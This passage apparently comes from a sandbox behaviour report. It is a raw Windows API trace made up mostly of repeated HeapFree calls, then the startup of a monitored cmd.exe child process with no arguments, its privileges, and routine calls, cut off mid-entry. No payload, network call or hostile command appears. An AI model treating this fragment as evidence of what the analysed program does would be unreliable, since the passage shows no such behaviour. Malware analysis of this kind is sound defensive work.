hHeap=0x470000) returned 1 [0316.493] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.546] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.546] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0316.546] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0316.628] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.662] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.682] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.682] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.683] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.683] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.690] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.691] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.693] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.694] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.694] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.702] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.710] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.712] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.714] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.715] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.715] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.718] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.867] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0316.867] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.867] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.874] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0316.874] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.874] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.874] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0316.880] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.880] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0316.881] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0316.901] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0316.905] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0316.906] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0316.906] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0316.906] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0316.908] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.056] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.067] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.067] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.067] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.069] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.069] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.070] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.070] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.084] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0317.086] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41a3008 | out: hHeap=0x470000) returned 1 [0317.086] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0317.086] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.086] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.089] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.103] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.211] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0317.218] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0317.222] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.224] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.225] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.233] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.233] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.233] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.235] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.235] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.235] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.237] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.237] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0317.237] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.242] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.379] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.417] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0317.418] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.418] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.434] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0317.434] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.436] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0317.436] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.446] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0317.446] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.449] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0317.449] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.450] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0317.451] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.451] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4193000 | out: hHeap=0x470000) returned 1 [0317.451] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.451] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.452] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0317.455] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0317.456] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.456] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.457] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.458] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.459] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.459] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0317.460] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.460] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4182ff8 | out: hHeap=0x470000) returned 1 [0317.460] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4172ff0 | out: hHeap=0x470000) returned 1 [0317.461] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0317.461] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0317.461] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4077ee0 | out: hHeap=0x470000) returned 1 [0317.520] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0317.520] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0317.520] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0317.924] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0317.924] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0317.943] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0317.950] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0317.951] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0317.951] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0317.953] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0317.953] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0318.039] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0318.041] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0318.043] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0318.043] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0318.184] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x41405c8 | out: hHeap=0x470000) returned 1 [0318.185] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0318.350] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.351] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.351] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0318.351] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0318.351] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0318.361] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0318.362] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.368] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0318.370] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.370] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0318.370] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0318.373] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0318.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0318.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0318.562] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0318.584] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.588] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.905] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.909] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.914] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.917] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.921] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.924] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.931] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.934] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.937] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0318.941] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.118] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.121] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.125] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.129] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.133] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.136] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.140] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.143] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.147] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.150] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.725] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.729] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.733] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.738] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.742] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.746] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.750] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.756] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.760] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0319.765] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.000] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.007] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.011] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.014] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.018] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.024] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.027] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.031] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.067] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.072] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.077] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.290] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.585] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0320.589] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0320.593] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0320.598] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0320.602] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0320.607] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0320.611] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0320.616] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0320.687] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0321.641] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0321.645] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0321.651] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0321.656] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0321.660] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0321.665] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0321.913] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0321.920] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0321.927] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0321.935] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0321.942] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0321.949] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 Thread: id = 55 os_tid = 0xe48 Thread: id = 56 os_tid = 0xe4c Thread: id = 61 os_tid = 0xe78 Thread: id = 63 os_tid = 0xe80 Thread: id = 64 os_tid = 0xe84 Thread: id = 65 os_tid = 0xe88 Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x37813000" os_pid = "0xddc" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xdd0" cmd_line = "\"C:\\WINDOWS\\system32\\cmd.exe\"" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001684b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 33 os_tid = 0xde0 [0287.620] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7dbb70000 [0287.620] __set_app_type (_Type=0x1) [0287.620] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7dbb86d00) returned 0x0 [0287.620] __getmainargs (in: _Argc=0x7ff7dbba9200, _Argv=0x7ff7dbba9208, _Env=0x7ff7dbba9210, _DoWildCard=0, _StartInfo=0x7ff7dbba921c | out: _Argc=0x7ff7dbba9200, _Argv=0x7ff7dbba9208, _Env=0x7ff7dbba9210) returned 0 [0287.620] _onexit (_Func=0x7ff7dbb87fd0) returned 0x7ff7dbb87fd0 [0287.620] _onexit (_Func=0x7ff7dbb87fe0) returned 0x7ff7dbb87fe0 [0287.621] _onexit (_Func=0x7ff7dbb87ff0) returned 0x7ff7dbb87ff0 [0287.621] _onexit (_Func=0x7ff7dbb88000) returned 0x7ff7dbb88000 [0287.621] _onexit (_Func=0x7ff7dbb88010) returned 0x7ff7dbb88010 [0287.622] _onexit (_Func=0x7ff7dbb88020) returned 0x7ff7dbb88020 [0287.622] GetCurrentThreadId () returned 0xde0 [0287.622] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xde0) returned 0x70 [0287.623] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffb3c210000 [0287.623] GetProcAddress (hModule=0x7ffb3c210000, lpProcName="SetThreadUILanguage") returned 0x7ffb3c22a990 [0287.623] SetThreadUILanguage (LangId=0x0) returned 0x409 [0288.218] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0288.218] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x202efdfa98 | out: phkResult=0x202efdfa98*=0x0) returned 0x2 [0288.219] VirtualQuery (in: lpAddress=0x202efdfa84, lpBuffer=0x202efdfa00, dwLength=0x30 | out: lpBuffer=0x202efdfa00*(BaseAddress=0x202efdf000, AllocationBase=0x202eee0000, AllocationProtect=0x4, __alignment1=0xffffb203, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0288.219] VirtualQuery (in: lpAddress=0x202eee0000, lpBuffer=0x202efdfa00, dwLength=0x30 | out: lpBuffer=0x202efdfa00*(BaseAddress=0x202eee0000, AllocationBase=0x202eee0000, AllocationProtect=0x4, __alignment1=0xffffb203, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0288.219] VirtualQuery (in: lpAddress=0x202eee1000, lpBuffer=0x202efdfa00, dwLength=0x30 | out: lpBuffer=0x202efdfa00*(BaseAddress=0x202eee1000, AllocationBase=0x202eee0000, AllocationProtect=0x4, 